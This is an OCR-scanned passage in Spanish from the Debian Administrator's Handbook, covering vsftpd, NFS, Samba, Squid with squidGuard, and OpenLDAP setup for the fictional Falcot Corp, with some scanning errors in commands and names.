Hay  muchos  servidores  FTP  disponibles  en  Debian  (ftpd,  proftpd-hasic,  ftpd,  etc.).  Los  administra- 
dores  de  Falcot  Corp  seleccionaron  vsftpd  porque  solo  utilizan  el  servidor  FTP  para  distribuir 
unos  pocos  archivos  (incluyendo  un  repositorio  de  paquetes  Debian);  como  no  necesitan  funcio- 
nalidades  avanzadas,  eligieron  enfocarse  en  los  aspectos  de  seguridad. 
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Instalar  el  paquete  crea  un  usuario  de  sistema  ftp.  Siempre  se  utiliza  esta  cuenta  para  co- 
nexiones  FTP  anonimas,  y  su  directorio  personal  (/srv/ftp/)  es  la  ralz  del  arbol  al  que  tie- 
nen  acceso  los  usuarios  que  se  conecten  a  este  servicio.  La  configuracion  predeterminada  (en 
/etc/vsftpd  .  conf)  requiere  algunso  cambios  para  permitir  poner  a  disposicion  archivos  gran- 
des  para  su  descarga  publica:  es  necesario  habilitar  el  acceso  anonimo  (anonymous_enable=YES) 
y  se  debe  desactivar  el  acceso  (de  solo  lectura)  para  los  usuarios  locales  (local_enable=NO).  Este 
ultimo  punto  es  particularmente  importante,  puesto  que  el  protocolo  FTP  no  utiliza  cifrado  y 
podria  interceptarse  la  contrasena  de  los  usuario  a  traves  de  la  red. 


11.4.  Servidor  de  archivos  NFS 

NFS  ( sistema  de  archivos  de  red:  «Network  File  System»)  es  un  protocolo  que  permite  acceso  re- 
moto  a  un  sistema  de  archivos  a  traves  de  la  red.  Todos  los  sistemas  Unix  pueden  trabajar  con 
este  protocolo;  cuando  se  involucran  sistemas  Windows,  debe  utilizar  Samba  en  su  lugar. 

NFS  es  una  herramienta  muy  util.  Si  bien  anteriormente  ha  tenido  muchas  limitaciones,  la  ma- 
yoria  ha  desaparecido  con  la  version  4  del  protocolo.  El  inconveniente  es  qu  ela  ultima  version 
de  NFS  e  mas  dificil  de  configurar  cuando  se  quieren  utilizar  funciones  basicas  de  seguridad 
como  la  autenticacion  y  el  cifrado,  puesto  que  se  basa  en  Kerberos  para  estas  funcionalidades. 
Sin  estas,  el  protocolo  NFS  tiene  que  restringirse  a  la  utilizacion  en  una  red  local  de  confianza 
puesto  que  los  datos  que  circulan  por  la  red  no  estan  cifrados  (un  sniffer  los  puede  interceptar) 
y  los  permisos  de  acceso  se  conceden  en  funcion  de  la  direccion  IP  del  cliente  (que  puede  ser 
suplantada). 


DOCUMENTACION  Es  relativamente  complicado  encontrar  buena  documentacion  acerca  de  NFSv4.  In- 
«HOWTO»  de  NFS  clufmos  aqui  algunos  enlaces  con  explicaciones  de  distinta  calidad  que  al  menos 
proporcionan  algunas  pistas  (en  ingles)  sobre  lo  que  debe  hacerse. 

»•  https : //help . ubuntu . com/community/NFSv4Howto 

http : //wiki  .linux-nfs  . org/wiki/ index .  php/l\lf  sv4_con figuration 


11.4.1.  Proteccion  de  NFS 

Si  no  se  utilizan  las  caracteristicas  de  seguridad  basadas  en  Kerberos,  deberia  asegurarse  de 
que  solo  los  equipos  autorizados  a  utilizar  NFS  puedan  conectarse  a  los  varios  servidores  RPC 
necesarios,  porque  el  protocolo  basico  confia  en  la  informacion  recibida  a  traves  de  la  red.  El 
firewall  deberia  por  tanto  prohibir  la  usurpation  de  IPs  («IP  spoofing»)  para  prevenir  que  una 
maquina  externa  se  haga  pasar  por  una  interna  y  el  acceso  a  los  puertos  apropiados  deberia 
estar  restringido  unicamente  a  los  equipos  que  deban  acceder  a  espacios  compartidos  por  NFS. 
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VOLVER  A  LOS  CIMIENTOS  RPC  ( Ltamada  a  procedimiento  remoto:  «Remote  Procedure  Call»)  es  un  estandar 
RPC  Unix  para  servicios  remotos.  NFS  es  uno  de  esos  servicios. 

Los  servicios  RPC  se  registran  en  un  directorio  conocido  como  portmapper  («aso- 
ciador  de  puertos»).  Un  cliente  que  desee  realizar  una  consulta  NFS  primero  debe 
dirigirse  al  portmapper  (en  el  puerto  1 11,  TCP  o  UDP)  y  preguntar  por  el  servidor 
NFS;  la  respuesta  generalmente  mencionara  el  puerto  2049  (el  predeterminado  para 
NFS).  No  todos  los  servicios  RPC  utilizan  un  puerto  fijo  necesariamente. 


Las  versiones  antiguas  del  protocolo  requerfan  otros  servicios  RPC  que  utilizaban  puertos  asigna- 
dos  dinamicamente.  Afortunadamente,  con  la  version  4  de  NFS  solo  son  necesarios  los  puertos 
2049  (para  el  NFS  propiamente)  y  el  111  (para  el  portmapper),  por  lo  que  son  faciles  de  filtrar 
mediante  un  cortafuegos. 


1 1.4.2.  Servidor  NFS 

El  servidor  NFS  es  parte  del  nucleo  Linux;  en  los  nucleos  que  Debian  provee  esta  compilado 
como  un  modulo  de  nucleo.  Si  necesita  ejecutar  el  servidor  NFS  automaticamente  al  iniciar,  debe 
instalar  el  paquete  nfs-kernel-server ;  contiene  los  scripts  de  inicio  relevantes. 

El  archivo  de  configuracion  del  servidor  NFS,  /etc/exports,  enumera  los  directorios  que  esta- 
ran  disponibles  en  la  red  ( exportados ).  Para  cada  espacio  compartido  NFS,  solo  tendran  acceso 
las  maquinas  especificadas.  Puede  obtener  un  control  mas  detallado  con  unas  pocas  opciones. 
La  sintaxis  para  este  archivo  es  bastante  simple: 

/directorio/a/compartir  maquinal(opcionl,opcion2, . . . )  maquina2( . . . )  ... 

Es  importante  recalcar  que  con  NFSv4  todas  las  carpetas  exportadas  deben  ser  parte  de  un  unico 
arbol  de  directorios  y  que  el  directorio  raiz  de  este  arbol  debe  ser  exportado  e  identificado  con 
la  opcion  f s i d = 0  o  fsid=root. 

Puede  identificar  cada  maquina  mediante  su  nombre  DNS  o  su  direccion  IP.  Tambien  puede  es- 
pecificar  conjuntos  completos  de  maquinas  utilizando  una  sintaxis  como  *.falcot.com  o  un  rango 
de  direcciones  IP  192.168.0.0/255.255.255.0  o  192.168.0.0/24. 

De  forma  predeterminada  (o  si  utiliza  la  opcion  ro),  los  directorios  estan  disponibles  solo  pa¬ 
ra  lectura.  La  opcion  rw  permite  acceso  de  lectura  y  escritura.  Los  clientes  NFS  tipicamente  se 
conectan  desde  un  puerto  restringido  solo  a  root  (en  otras  palabras,  menor  a  1024);  puede  eli- 
minar  esta  restriccion  con  la  opcion  insecure  (la  opcion  secure  es  implicita,  pero  puede  hacerla 
explicita  para  mas  claridad). 

De  forma  predeterminada,  el  servidor  solo  respondera  a  peticiones  NFS  cuando  se  complete  la 
operacion  actual  de  disco  (la  opcion  sync);  puede  desactivar  esta  funcionalidad  con  la  opcion 
async.  Las  escrituras  asincronas  aumentaran  un  poco  el  rendimiento  a  cambio  de  una  disminu- 
cion  de  la  fiabilidad,  debido  al  riesgo  de  perdida  de  datos  en  caso  de  un  cierre  inesperado  del 
servidor  durante  el  tiempo  que  transcurre  entre  que  se  recibe  la  peticion  de  escritura  y  cuan¬ 
do  los  datos  hayan  sido  escritos  realmente  en  el  disco.  Debido  a  que  el  valor  predeterminado 
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cambio  recientemente  (comparado  con  el  valor  historico  de  NFS),  se  recomienda  configurarlo 
explicitamente. 

Para  no  proveerle  acceso  de  root  al  sistema  de  archivos  a  ningun  cliente  NFS,  el  servidor  con- 
siderara  todas  las  consultas  que  parezcan  provenir  de  un  usuario  root  como  si  provinieran  del 
usuario  nobody.  Este  comportamiento  corresponde  a  la  opcion  root_squash  y  esta  activado  de 
forma  predeterminada.  La  opcion  no_root_squash,  que  desactiva  este  comportamiento,  es  ries- 
gosa  y  solo  debe  ser  utilizada  en  entornos  controlados.  Las  opciones  anonuid =uid  y  anongid= 
gid  permiten  especificar  otro  usuario  falso  que  sera  utilizado  en  lugar  den  UID/GID  65534  (que 
corresponden  al  usuario  nobody  y  al  grupo  nogroup). 

Con  NFSv4  se  puede  anadir  la  opcion  sec  para  precisar  el  nivel  de  seguridad  deseado:  sec=sys  es 
el  valor  predeterminado  sin  ningun  tipo  de  seguridad  particular,  sec=krb5  habilita  unicamente 
la  autenticacion,  sec=krb5i  anade  una  proteccion  de  integridad  y  sec=krb5p  es  el  nivel  mas  alto, 
que  incluye  la  proteccion  de  la  confidencialidad  (mediante  el  cifrado  de  datos).  Para  que  todo 
esto  pueda  funcionar  es  necesaria  una  instalacion  funcional  de  Kerberos  (este  libro  no  se  trata 
en  este  libro). 

Existen  otras  opciones  disponibles;  estan  documentadas  en  la  pagina  de  manual  expo  rts  ( 5 ) . 


precaucion  El  script  de  inicio  /etc/init . d/nfs- kernel- server  solo  inicia  el  servidor  si  el 
Primera  instalacion  archivo  /etc/exports  incluye  al  menos  uno  o  mas  espacios  compartidos  NFS  va- 
lidos.  En  la  configuracion  inicial,  una  vez  que  edito  este  archivo  para  que  contenga 
elementos  validos,  debera  iniciar  el  servidor  NFS  ejecutando  lo  siguiente: 

#  service  nf s-kernel-server  start 


1 1.4.3.  Cliente  NFS 

Como  con  cualquier  otro  sistema  de  archivos,  incorporar  un  espacio  compartido  NFS  en  el  jerar- 
quia  del  sistema  es  necesario  montarlo.  Debido  a  que  este  sistema  de  archivos  tiene  sus  peculia- 
ridades  fueron  necesarios  unos  pocos  ajustes  en  la  sintaxis  de  mount  y  en  el  archivo  /etc/f  stab. 


Ejemplo  11. 22  Montaje  manual  con  el  programa  mount 


#  mount  -t  nfs4  -o  rw,nosuid  arrakis . internal . falcot . com : /shared  /srv/shared 


Ejemplo  1 1.23  Elemento  NFS  en  el  archivo  /etc/ f stab 


arrakis . internal . falcot . com : /shared  /srv/shared  nfs4  rw,nosuid  0  0 


El  elemento  descrito  monta  automaticamente  en  cada  arranque  del  sistema  el  directorio  NFS 
/shared/  desde  el  servidor  arrakis  en  el  directorio  local  /srv/shared/.  Se  solicita  acceso  de 
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lectura  y  escritura  (de  ahi  el  parametro  rw).  La  opcion  nosuid  es  una  medida  de  proteccion  que 
elimina  cualquier  bit  setuid  o  setgid  de  los  programas  almacenados  en  el  espacio  compartido. 
Si  el  espacio  compartido  NFS  esta  destinado  unicamente  a  almacenar  documentos,  tambien  se 
recomienda  utilizar  la  opcion  noexec,  que  evita  la  ejecucion  de  programas  almacenados  en  el 
espacio  compartido.  Es  importante  tener  en  en  cuenta  que,  en  el  servidor,  el  directorio  sha  red  se 
encuentra  dentro  del  directorio  exportado  como  raiz  de  NFSv4  (por  ejemplo  /export/sha  red), 
no  es  un  directorio  de  primer  nivel. 

La  pagina  de  manual  nf s  ( 5 )  describe  todas  las  opciones  con  algo  de  detalle. 


11.5.  Configuracion  de  espacios  compartidos  Windows  con  Samba 

Samba  es  un  conjunto  de  herramientas  que  administran  el  protocolo  SMB  (tambien  conocido 
como  «CIFS»)  en  Linux.  Windows  utiliza  este  protocolo  para  espacios  compartidos  de  red  e  im- 
presoras  compartidas. 

Samba  tambien  puede  actuar  como  un  controlador  de  dominio  Windows.  Esta  es  una  herramien- 
ta  sobresaliente  para  asegurar  una  integracion  perfecta  entre  servidores  Linux  y  las  maquinas 
de  escritorios  en  las  oficinas  que  todavia  utilizan  Windows. 


11.5.1.  Servidor  Samba 

El  paquete  samba  contiene  los  dos  servidores  principals  de  Samba  4:  smbd  y  nmbd. 


DOCUMENTACION  El  servidor  Samba  es  extremadamente  configurable  y  versatil  y  puede  adaptarse  a 
Yendo  mas  alia  muchos  casos  de  uso  diferentes  con  requisitos  y  arquitecturas  de  red  muy  distintas. 

Este  libro  se  centrara  en  el  uso  de  Samba  como  un  servidor  autonomo,  pero  tambien 
puede  utilizarse  como  controlador  de  un  dominio  NT4,  como  controlador  de  un 
dominio  basado  en  Active  Directory  o  tambien  como  un  simple  servidor  integrado 
en  un  dominio  ya  existente  (que  puede  estar  gestionado  por  un  servidor  Windows). 

El  paquete  samba-doc  package  contiene  una  gran  cantidad  de  archivos  de  ejemplo 
comentados  en  /usr/share/doc/samba-doc/examples/. 


HERRAMIENTA 

Winbind  provee  a  los  administradores  de  sistemas  la  opcion  de  utilizar  un  servidor 

Autenticacion  con  un 

Windows  como  servidor  de  autenticacion.  Winbind  tambien  se  integra  li 

mpiamen- 

servidor  Windows 

te  con  PAM  y  NSS.  Esto  permite  configurar  maquinas  Linux  en  las  que 
usuarios  de  un  dominio  Windows  automaticamente  tienen  una  cuenta. 

todos  los 

Puede  encontrar  mas  informacion  en  el  directorio  /us r/share/doc/samba- doc/ 

examples/pam  winbind/. 

Configuracion  con  debconf 

El  paquete  define  una  configuracion  minima  durante  la  instalacion  inicial.  No  obstante  es  muy 
recomendable  adaptar  la  configuracion  a  posteriori  ejecutando  la  orden  dpkg-  reconfigure  s 
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amba-common. 


Lo  primero  que  tenemos  que  configurar  es  el  nombre  del  grupo  de  trabajo  al  que  pertenecera  el 
servidor  Samba  (en  el  caso  de  Falcot,  la  respuesta  es  FALCOTNET). 

El  paquete  tambien  propone  identificar  el  servidor  WINS  de  la  informacion  provista  por  el  demo- 
nio  DHCP.  Los  administradores  de  Falcot  Corp  rechazaron  esta  opcionya  que  pretenden  utilizar 
el  servidor  Samba  en  si  como  servidor  WINS. 


Configuration  manual 

Cambios  en  smb.  conf  Los  requisitos  en  Falcotr  requieren  modificar  otras  opciones  en  el  ar- 
chivo  de  configuracion  /etc/samba/smb .  conf .  Los  siguientes  extractos  resumen  los  cambios 
realizados  en  la  seccion  [global], 

[global] 

##  Browsing/Identification  ### 

#  Change  this  to  the  workgroup/NT-domain  name  your  Samba  server  will  part  of 

workgroup  =  FALCOTNET 

#  Windows  Internet  Name  Serving  Support  Section: 

#  WINS  Support  -  Tells  the  NMBD  component  of  Samba  to  enable  its  WINS  Server 

wins  support  =  yes  O 

[...] 

#######  Authentication  ####### 

#  Server  role.  Defines  in  which  mode  Samba  will  operate.  Possible 

#  values  are  "standalone  server",  "member  server",  "classic  primary 

#  domain  controller",  "classic  backup  domain  controller",  "active 

#  directory  domain  controller". 

# 

#  Most  people  will  want  "standalone  sever"  or  "member  server". 

#  Running  as  "active  directory  domain  controller"  will  require  first 

#  running  "samba-tool  domain  provision"  to  wipe  databases  and  create  a 

#  new  domain. 

server  role  =  standalone  server 

#  "security  =  user"  is  always  a  good  idea.  This  will  require  a  Unix  account 

#  in  this  server  for  every  user  accessing  the  server. 

security  =  user  e 

[...] 
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O  Indica  que  Samba  debe  funcionar  como  un  servidor  de  nombres  Netbios  (WINS)  para  la 
red  local. 

e  Este  es  el  valor  predeterminado  para  este  parametro;  sin  embargo,  como  es  central  a  la 
configuration  de  Samba,  se  recomienda  rellenarlo  expHcitamente.  Cada  usuario  debe  au- 
tenticarse  antes  de  acceder  a  cualquier  espacio  compartido. 

Anadir  usuarios  Cada  usuario  Samba  necesita  una  cuenta  en  el  servidor;  primero  debe  crear 
las  cuentas  Unix,  luego  necesita  registrar  el  usuario  en  la  base  de  datos  de  Samba.  El  paso  de 
Unix  se  realiza  de  la  forma  normal  (por  ejemplo,  utilizando  add  user). 

Agregar  un  usuario  existente  a  la  base  de  datos  de  Samba  solo  es  cuestion  de  ej  ecu  tar  smbpa  sswd 
-  a  usuario;  esto  pedira  la  contrasena  de  forma  interactiva. 

Puede  eliminar  un  usuario  ejecutando  smbpasswd  -x  usuario.  Tambien  puede  desactivar 
temporalmente  una  cuenta  Samba  (con  smbpasswd  -d  usuario )  y  reactivarla  despues  (con 
smbpasswd  -e  usuario). 


11.5.2.  Cliente  Samba 

La  funcionalidad  de  cliente  en  Samba  le  permite  a  una  maquina  Linux  acceder  a  espacios  e  im- 
presoras  compartidas  en  Windows.  Los  programas  necesarios  se  encuentran  en  los  paquetes 
cifs-utils  y  smbclient. 

El programa  smbclient 

El  programa  smbclient  consulta  servidores  SMB.  Puede  utilizarse  la  opcion  -U  usuario,  pa¬ 
ra  conectarse  con  el  servidor  bajo  una  identidad  concreta.  Con  smbclient  //servidor/ 
espaciocompartido  se  accede  al  espacio  compartido  de  modo  interactive  como  si  se  tratara 
de  un  cliente  LTP  en  una  consola.  smbclient  -  L  servidor  enumerara  todos  los  espacios  com- 
partidos  (y  visibles)  en  un  servidor. 


Montaje  de  espacios  compartidos  de  Windows 

El  programa  mount  permite  montar  un  espacio  compartido  de  Windows  en  la  jerarqufa  del  sis- 
tema  de  archivos  de  Linux  (con  la  ayuda  de  mount .  cits  provisto  por  cifs-utils). 


Ejemplo  11.24  Montaje  de  un  espacio  compartido  de  Windows 


mount  -t  cits  //arrakis/shared  /shared  \ 

-o  c redent ials=/etc/smb- credentials 

El  archivo  /etc/smb-  credentials  (que  no  debe  ser  accesible  por  usuarios)  tiene  el  siguiente 
formato: 
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username  =  usuario 
password  =  contrasena 

Puede  especificar  otras  opciones  en  la  lrnea  de  ordenes;  la  lista  completa  se  encuentra  disponible 
en  la  pagina  de  manual  mount .  cif  s  ( 1 ) .  Dos  opciones  en  particular  pueden  ser  interesantes:  uid 
y  gid  que  permiten  forzar  el  usuario  y  grupo  duenos  de  los  archivos  disponibles  en  el  punto  de 
montaje  para  no  restringir  el  acceso  a  root. 

Tambien  puede  configurar  el  montaje  de  un  espacio  compartido  Windows  en  /etc/f  stab: 

/ / servidor/ shared  /shared  cits  credentials=/etc/smb-credentials 

Puede  desmontar  un  espacio  compartido  SMB/CIFS  con  el  programa  umount  estandar. 


Impresion  en  una  impresora  compartida 

CUPS  es  una  solucion  elegante  para  imprimir  desde  una  estacion  de  trabajo  Linux  en  una  impre¬ 
sora  compartida  por  una  maquina  Windows.  Cuando  instale  smbclient,  CUPS  le  permitira  instalar 
impresoras  compartidas  Windows  de  forma  automatica. 

Los  pasos  necesarios  son  los  siguientes: 

■  Introduzca  la  interfaz  dec  configuration  CUPS:  http://localhost:631/admin 

■  Pulse  en  «Agregar  impresora». 

■  Seleccione  el  dispositivo  de  impresion,  elija  «Impresora  Windows  via  SAMBA». 

■  Introduzca  la  URI  de  conexion  para  la  impresora  de  red.  Deberia  ser  similar  a  la  siguiente: 
smb://  usuario-.contrasena@  servidor/ impresora. 

■  Introduzca  el  nombre  que  identificara  univocamente  a  esta  impresora.  Luego  introduzca 
la  descripcion  y  la  ubicacion  de  la  impresora.  Se  mostraran  estas  cadenas  a  los  usarios 
para  ayudarlos  a  identificar  las  impresoras. 

■  Indique  el  fabricante/modelo  de  la  impresora  o,  directamente,  provea  un  archivo  de  des¬ 
cripcion  de  impresora  (PDD:  «Printer  Description  File»)  funcional. 

Voila,  jla  impresora  ya  esta  lista! 


11.6.  Proxy  HTTP/FTP 

Un  proxy  HTTP/FTP  funciona  como  intermediaro  para  conexiones  HTTP  y/o  FTP.  Su  rol  es  do- 
ble: 


■  Actuar  como  cache:  los  documentos  que  han  sido  descargados  recientemente  son  copia- 
dos  localmente  para  evitar  multiples  descargas. 


300 


El  manual  del  Administrador  de  Debian 


■  Servidor  de  filtro:  si  el  uso  del  proxy  es  obligatorio  (y  se  bloquean  las  conexiones  salientes 
a  menos  que  sean  a  traves  del  proxy),  entonces  el  proxy  puede  determinar  si  se  permite 
o  no  el  pedido. 

Falcot  Corp  eligio  a  Squid  como  su  servidor  proxy. 


11.6.1.  Instalacion 

El  paquete  Debian  squid3  solo  contiene  el  proxy  (cache)  modular.  Para  convertirlo  en  un  servi¬ 
dor  de  filtro  necesitara  instalar  el  paquete  adicional  squidguard.  Ademas,  squid-cgi  provee  una 
interfaz  de  consulta  y  administracion  para  un  proxy  Squid. 

Antes  de  instalarlo,  debe  asegurarse  que  el  sistema  pueda  identificar  su  propio  nombre  completo: 
hostname  f  debe  devolver  el  nombre  completamente  calificado  (incluyendo  el  dominio).  Si  no 
lo  hace,  entonces  debe  editar  el  archivo  /  etc/hosts  para  que  contenga  el  nombre  completo  del 
sistema  (por  ejemplo,  arrakis.falcot.com).  El  nombre  oficial  del  equipo  debe  ser  validado  con  el 
administrador  de  la  red  para  evitar  posibles  conflictos  de  nombre. 


11.6.2.  Configuracion  de  un  cache 

Activar  la  funcionalidad  de  servidor  de  cache  es  tan  simple  como  editar  el  archivo  de  configura¬ 
cion  /etc/squid3/squid .  conf  y  permitir  que  las  maquinas  en  la  red  local  realicen  consultas  a 
traves  del  proxy.  El  siguiente  ejemplo  muestra  las  modificaciones  realizadas  por  los  administra- 
dores  de  Falcot  Corp: 


Ejemplo  11.25  El  archivo  /etc/  squid3/  squid .  conf  (extractos) 


#  AGREGUE  SUS  PROPIAS  REGLAS  AQUI  PARA  PERMITIR  ACCESO  DE  SUS  CLIENTES 

#  Regia  de  ejemplo  que  permite  acceso  desde  su  red  local.  Adaptela 

#  para  incluir  sus  redes  IP  (internas)  desde  las  que  se  debe 

#  permitir  navegar 

acl  ournetworks  src  192.168.1.0/24  192.168.2.0/24 
httpaccess  allow  ournetworks 
httpaccess  allow  localhost 

#  Finalmente,  negar  todo  otro  acceso  a  este  proxy 
httpaccess  deny  all 


11.6.3.  Configuracion  de  un  filtro 

squid  por  si mismo  no  realiza  el  filtrado;  esta  accion  es  delegada  a  squidGua  rd.  Debe  configurar 
el  primero  para  que  interactue  con  este  ultimo.  Esto  incluye  agregar  la  siguiente  directiva  en  el 
archivo  /etc/squid3/squid . conf: 
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urlrewrite  program  /us r/bin/squidGuard  -c  /etc/squid3/squidGuard . conf 


Tambien  necesita  instalar  el  programa  CGI  /usr/lib/cgi-  bin/squidGua  rd  .  cgi  utilizando 
/usr/s  ha  re/doc/ squidgua  rd/examples/ squidGuard  .  cgi  .gz  como  punto  de  partida.  Las  mo- 
dificaciones  necesarias  a  este  script  son  las  varialbes  $proxy  y  $proxymaster  (el  nombre  del 
proxy  y  el  correo  de  contacto  del  administrador,  respectivamente).  Las  variables  $image  y 
$  redirect  deben  apuntar  a  imagenes  existentes  que  representen  el  rechazo  de  una  consulta. 

Debe  ejecutar  service  squid3  reload  para  activar  el  filtro.  Sin  embargo,  debido  a  que  el  pa- 
quete  squidguard  no  realiza  ningun  filtrado  de  forma  predeterminada,  corresponde  al  adminis¬ 
trador  definir  una  poh'tica.  Puede  hacerlo  se  debe  crear  el  archivo  /etc/squid3/squidGuard  . 
conf  (utilizando  la  plantilla  /etc/squidgua rd/squidGua rd  .  conf  .default  si  lo  desea). 

Debe  regenerar  la  base  de  datos  de  trabajo  con  update- squidguard  luego  de  cada  modification 
al  archivo  de  configuration  de  squidGuard  (o  uno  de  las  listas  de  dominios  o  URLs  que  men- 
ciona).  La  sintaxis  del  archivo  de  configuration  se  encuentra  documentada  en  el  siguiente  sitio 
web: 

http : //www. squidguard . org/Doc/configu re . html 


ALTERNATIVA  El  paquete  dansguardian  es  una  alternativa  a  squidguard.  Este  software  no  solo 
DansGuardian  gestiona  una  lista  negra  de  URLs  prohibidas,  sino  que  puede  aprovechar  el  sistema 
PICS  ( plataforma  para  selection  de  contenido  en  Internet :  «Platform  for  Internet 
Content  Selection*)  para  decidir  si  una  pagina  es  aceptable  mediante  el  analisis 
dinamico  de  su  contenido. 


11.7  Directorio  LDAP 


OpenLDAP  es  una  implementation  del  protocolo  LDAP;  en  otras  palabras,  es  una  base  de  datos 
de  proposito  especial  disenada  para  almacenar  directories  (N.T.  directorio  en  el  sentido  de  direc¬ 
torio/ agenda  de  personas,  equipos  o  configuraciones,  no  directorio  de  un  sistema  de  archivos). 
En  el  caso  de  uso  mas  comun,  utilizar  un  servidor  LDAP  permite  centralizar  la  administracion 
de  las  cuentas  de  usuario  y  los  permisos  relacionados.  Ademas  se  puede  replicar  facilmente  una 
base  de  datos  LDAP,  lo  que  permite  configurar  varios  servidores  LDAP  sincronizados.  Cuando 
la  red  y  la  cantidad  de  usuarios  crecen  rapidamente  se  puede  balancear  la  carga  entre  varios 
servidores. 

Los  datos  LDAP  son  estructurados  y  jerarquicos.  La  estructura  es  definida  por  «esquemas» 
(«schemas»)  que  describen  el  tipo  de  objetos  que  la  base  de  datos  puede  almacenar  junto  con 
una  lista  de  todos  sus  atributos  posibles.  La  sintaxis  utilizada  para  hacer  referencia  a  un  objeto 
particular  en  la  base  de  datos  esta  basada  en  esta  estructura,  lo  que  explica  su  complejidad. 
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1 1.7.1.  Instalacion 


El  paquete  slapd  contiene  el  servidor  OpenLDAP.  El  paquete  Idap-utils  incluye  herramientas  de 
linea  de  ordenes  para  interactuar  con  servidores  LDAP. 

La  instalacion  de  slapd  normalmente  solicita  muy  poca  informacion,  a  menos  que  haya  configu- 
rado  debconf  para  que  realice  pregun tas  con  menor  prioridad.  Afortunadamente  basta  ejecutar 
dpkg-  reconfigure  slapd  para  reconfigurar  la  base  de  datos  LDAP  mas  detalladamente: 

■  ^Evitar  la  configuracion  del  servidor  OpenLDAP?  No,  por  supuesto  que  deseamos  configu- 
rar  este  servicio. 

■  Nombre  de  dominio  DNS:  «falcot.com». 

■  Nombre  de  la  organizacion:  “Lalcot  Corp”. 

■  Debe  ingresar  la  contrasena  de  administracion. 

■  Base  de  datos  a  utilizar:  «MDB». 

■  ^Desea  eliminar  la  base  de  datos  cuando  se  purge  slapd ?  No.  No  tiene  sentido  arriesgarse 
a  perder  la  base  de  datos  por  error. 

■  ^Mover  una  base  de  datos  anterior?  Esta  pregunta  solo  es  realizada  cuando  se  intenta 
configurarlo  y  ya  existe  una  base  de  datos.  Solo  responda  «yes»  si  realmente  desea  iniciar 
nuevamente  desde  una  base  de  datos  limpia;  por  ejemplo,  si  ejecuta  dpkg  -  reconf  igu  re 
slapd  inmediatamente  despues  de  instalarlo  por  primera  vez. 

■  ^Permitir  el  protocol  LDAPv2?  No,  no  tiene  sentido.  Todas  las  herramientas  que  utilizare- 
mos  entienden  el  protocolo  LDAPv3. 


volver  A  LOS  cimientos  Un  archivo  LDIF  (formato  de  intercambios  de  datos  LDAP-.  «LDAP  Data  Interchan- 

Formato  LDIF  §e  Format»)  es  un  archivo  de  texto  portable  que  describe  el  contenido  de  una  base 

de  datos  LDAP  (o  una  porcion  de  la  misma);  puede  utilizarlo  para  introducir  datos 
en  otro  servidor  LDAP. 


Ahora  tiene  configurada  una  base  de  datos  minima,  como  podra  ver  con  la  siguiente  consulta: 

$  Idapsearch  -x  -b  dc=falcot,dc=com 

#  extended  LDIF 

# 

#  LDAPv3 

#  base  <dc=f alcot , dc=com>  with  scope  sub 

#  filter:  (objectclass=*) 

#  requesting:  ALL 

# 

#  falcot.com 
dn:  dc=falcot , dc=com 
objectClass:  top 
objectClass:  dcObject 
objectClass:  organization 
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o:  Falcot  Corp 
dc:  falcot 

#  admin,  falcot.com 

dn:  cn=admin , dc=falcot , dc=com 
objectClass :  simpleSecurityObject 
objectClass:  organizationalRole 
cn:  admin 

description:  LDAP  administrator 

#  search  result 
search:  2 
result:  0  Success 

#  numResponses :  3 

#  numEntries:  2 

La  consulta  devolvio  dos  objetos:  la  organizacion  en  si  mismo  y  el  usuario  de  administracion. 


1 1.7.2.  Relleno  del  directorio 

Debido  a  que  una  base  de  datos  vaci'a  no  es  particularmente  util,  se  trata  ahora  de  integrar  en 
ella  todos  los  directories  existenes;  esto  incluye  las  bases  de  datos  de  usuarios,  grupos,  servicios 
y  equipos. 

El  paquete  migrationtools  proporciona  un  conjunto  de  scripts  para  extraer  los  datos  de  los  directo¬ 
ries  estandar  de  Unix  (/etc/passwd,  /etc/group,  /etc/services,  /etc/hosts,  etc.),  convetir 
estos  datos  y  agregarlos  en  la  base  de  datos  LDAP. 

Una  vez  que  instalo  el  paquete,  es  necesario  editar  el  archivo  /etc/migrationtools/migrate_ 
common  .  ph;  debe  activar  las  opciones  IGNORE_UID_BELOW  y  IGNORE_GID_BELOW  (descomentar- 
las  es  suficiente)  y  debe  actualizar  DEFAULT_MAIL_DOMAIN/DEFAULT_BASE. 

La  operacion  de  migracion  en  si  es  gestionada  por  el  script  mig  rate_all_online .  sh,  como  si- 
gue: 

#  cd  /usr/share/migrationtools 

#  LDAPADD="/usr/bin/ldapadd  -c”  ETC_ALIASES=/dev/null  . /migrate_all_online.sh 

mig  rate_all_online .  sh  realizara  unas  pocas  preguntas  sobre  la  base  de  datos  LDAP  a  la  que 
migrara  los  datos.  La  Tabla  11.1  resume  las  respuestas  dadas  en  el  caso  de  uso  de  Lalcot. 

Deliberadamente  evitamos  migrar  el  archivo  /etc/aliases,  ya  que  el  esquema  estandar  pro- 
visto  por  Debian  no  incluye  la  estructura  que  utiliza  este  script  para  describir  alias  de  correo.  Si 
quisieramos  integrar  estos  datos  en  el  directorio,  debe  agregar  el  archivo  /etc/ldap/schema/ 
mi  sc .  schema  al  esquema  estandar. 
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Pregunta 

Respuesta 

Contexto  de  nombre  X.500 

dc=falcot,dc=com 

Nombre  del  servidor  LDAP 

localhost 

Administrador  del  DN 

cn=admin,dc=falcot,dc=com 

Credenciales  Bind 

la  contrasena  de  administracion 

Crear  DUAConfigProfile 

no 

Cuad  ro  11.1  Respuestas  a  las  preguntas  del  script  migrate  all  online .  sh 


HERRAMIENTA  El  programa  jxplorer  (en  el  paquete  del  mismo  nombre)  es  una  herramienta  gra- 
Navegacion  de  un  fica  <lue  Perm 'te  navegar  y  editar  una  base  de  datos  LDAP.  Es  una  herramienta 
directorio  LDAP  interesante  que  proporciona  al  administrador  una  buena  vision  de  la  estructura 
jerarquica  de  los  datos  de  LDAP. 


Sepa  tambien  que  el  programa  Idapadd  tiene  una  opcion  -c;  esta  opcion  solicita  que  no  se  de- 
tenga  el  proceso  en  caso  de  errores.  Es  necesario  utilizar  esta  opcion  debido  a  que  la  conversion 
del  archivo  /etc/services  genera  unos  pocos  errores  que  puede  ignorar  sin  problemas. 


1 1.7.3.  Administracion  de  cuentas  con  LDAP 

Ahora  que  la  base  de  datos  LDAP  contiene  informacion  util,  es  momento  de  utilizar  estos  datos. 
Esta  seccion  se  enfoca  en  como  configurar  un  sistema  Linux  para  que  los  directories  de  sistema 
utilicen  la  base  de  datos  LDAP. 


Configuracion  de  NSS 

El  sistema  NSS  (cambio  de  servicio  de  nombres:  «Name  Service  Switch»,  revise  el  recuadro  «NSS 
y  bases  de  datos  de  sistema»  pagina  167)  es  un  sistema  modular  disenado  para  definir  u  obtener 
